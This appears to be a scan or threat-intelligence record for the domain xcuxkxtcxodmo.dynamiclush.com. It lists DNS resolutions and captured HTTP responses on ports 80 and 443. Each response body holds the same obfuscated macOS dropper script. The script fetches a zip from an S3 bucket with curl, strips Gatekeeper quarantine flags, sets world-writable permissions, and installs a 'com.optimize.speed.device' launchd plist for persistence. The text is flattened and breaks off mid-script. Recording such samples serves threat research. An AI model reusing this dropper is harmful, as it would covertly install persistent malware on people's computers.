Domain > xcuxkxtcxodmo.dynamiclush.com
DNS Resolutions

| Date | IP Address |
|------|------------|
| 2025-06-30 | 52.44.181.155 (ClassC) |
| 2025-09-08 | 54.164.206.25 (ClassC) |
| 2025-10-15 | 18.211.80.86 (ClassC) |

Port 80
HTTP/1.1 200 OKServer: awselb/2.0Date: Mon, 08 Sep 2025 01:07:01 GMTContent-Type: text/plainContent-Length: 4083Connection: keep-aliveAccess-Control-Allow-Methods: OPTIONS,PUT,POST,GETAccess-Control-E HsKRIEUvIorQxPbWaEfUcom.optimize.speed.devicebvUDZZfczXhUSielgKYZOptimizeSpeedDeviceCSSHsqFJHaAuiectfICHgmrjkbwpmyixegwmtggeoNuTAgTskqxTYgLAOrQT/tmp/$CSSHsqFJHaAuiectfICHdFwGMcShBUayuZnvgyoYOptimizeSpeedDeviceif `id -u` 0 ; then sIhqZQVHeAJDauLDAtgD/Library/LaunchDaemons/$HsKRIEUvIorQxPbWaEfU.plist PUSzbjczNoElNLFObsYw/Library/Application Support/$bvUDZZfczXhUSielgKYZ if ! -f $sIhqZQVHeAJDauLDAtgD ; then mkdir -p $PUSzbjczNoElNLFObsYw curl --retry 5 -f https://kaeqxczotdifgni.s3.amazonaws.com/$dFwGMcShBUayuZnvgyoY.zip -o $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip xattr -r -d com.apple.quarantine $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip chmod -R 777 $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip ditto -x -k $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip $PUSzbjczNoElNLFObsYw xattr -r -d com.apple.quarantine $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY chmod -R 777 $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY mkdir -p $oNuTAgTskqxTYgLAOrQT touch $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist echo ?xml version1.0 encodingUTF-8?> !DOCTYPE plist PUBLIC -//Apple//DTD PLIST 1.0//EN http://www.apple.com/DTDs/PropertyList-1.0.dtd> plist version1.0> dict> key>Label/key> string>$HsKRIEUvIorQxPbWaEfU/string> key>Program/key> string>$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY/string> key>RunAtLoad/key> true /> key>StartInterval/key> integer>1800/integer> /dict> /plist> > $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist chmod -R 777 $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist cp -f $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist $sIhqZQVHeAJDauLDAtgD chmod -R 644 $sIhqZQVHeAJDauLDAtgD launchctl load -w $sIhqZQVHeAJDauLDAtgD rm -rf $oNuTAgTskqxTYgLAOrQT rm $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip fielse RWNGIYDH$(ls -l /dev/console | awk / / { print $3 
}) DHylOuwKNSVnPzVyUjRl$(eval echo ~$(echo $RWNGIYDH)) sIhqZQVHeAJDauLDAtgD$DHylOuwKNSVnPzVyUjRl/Library/LaunchAgents/$HsKRIEUvIorQxPbWaEfU.plist PUSzbjczNoElNLFObsYw$DHylOuwKNSVnPzVyUjRl/Library/
Port 443
HTTP/1.1 200 OKServer: awselb/2.0Date: Mon, 08 Sep 2025 01:07:02 GMTContent-Type: text/plainContent-Length: 4083Connection: keep-aliveAccess-Control-Allow-Methods: OPTIONS,PUT,POST,GETAccess-Control-E HsKRIEUvIorQxPbWaEfUcom.optimize.speed.devicebvUDZZfczXhUSielgKYZOptimizeSpeedDeviceCSSHsqFJHaAuiectfICHgmrjkbwpmyixegwmtggeoNuTAgTskqxTYgLAOrQT/tmp/$CSSHsqFJHaAuiectfICHdFwGMcShBUayuZnvgyoYOptimizeSpeedDeviceif `id -u` 0 ; then sIhqZQVHeAJDauLDAtgD/Library/LaunchDaemons/$HsKRIEUvIorQxPbWaEfU.plist PUSzbjczNoElNLFObsYw/Library/Application Support/$bvUDZZfczXhUSielgKYZ if ! -f $sIhqZQVHeAJDauLDAtgD ; then mkdir -p $PUSzbjczNoElNLFObsYw curl --retry 5 -f https://kaeqxczotdifgni.s3.amazonaws.com/$dFwGMcShBUayuZnvgyoY.zip -o $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip xattr -r -d com.apple.quarantine $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip chmod -R 777 $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip ditto -x -k $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip $PUSzbjczNoElNLFObsYw xattr -r -d com.apple.quarantine $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY chmod -R 777 $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY mkdir -p $oNuTAgTskqxTYgLAOrQT touch $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist echo ?xml version1.0 encodingUTF-8?> !DOCTYPE plist PUBLIC -//Apple//DTD PLIST 1.0//EN http://www.apple.com/DTDs/PropertyList-1.0.dtd> plist version1.0> dict> key>Label/key> string>$HsKRIEUvIorQxPbWaEfU/string> key>Program/key> string>$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY/string> key>RunAtLoad/key> true /> key>StartInterval/key> integer>1800/integer> /dict> /plist> > $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist chmod -R 777 $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist cp -f $oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist $sIhqZQVHeAJDauLDAtgD chmod -R 644 $sIhqZQVHeAJDauLDAtgD launchctl load -w $sIhqZQVHeAJDauLDAtgD rm -rf $oNuTAgTskqxTYgLAOrQT rm $PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip fielse RWNGIYDH$(ls -l /dev/console | awk / / { print $3 
}) DHylOuwKNSVnPzVyUjRl$(eval echo ~$(echo $RWNGIYDH)) sIhqZQVHeAJDauLDAtgD$DHylOuwKNSVnPzVyUjRl/Library/LaunchAgents/$HsKRIEUvIorQxPbWaEfU.plist PUSzbjczNoElNLFObsYw$DHylOuwKNSVnPzVyUjRl/Library/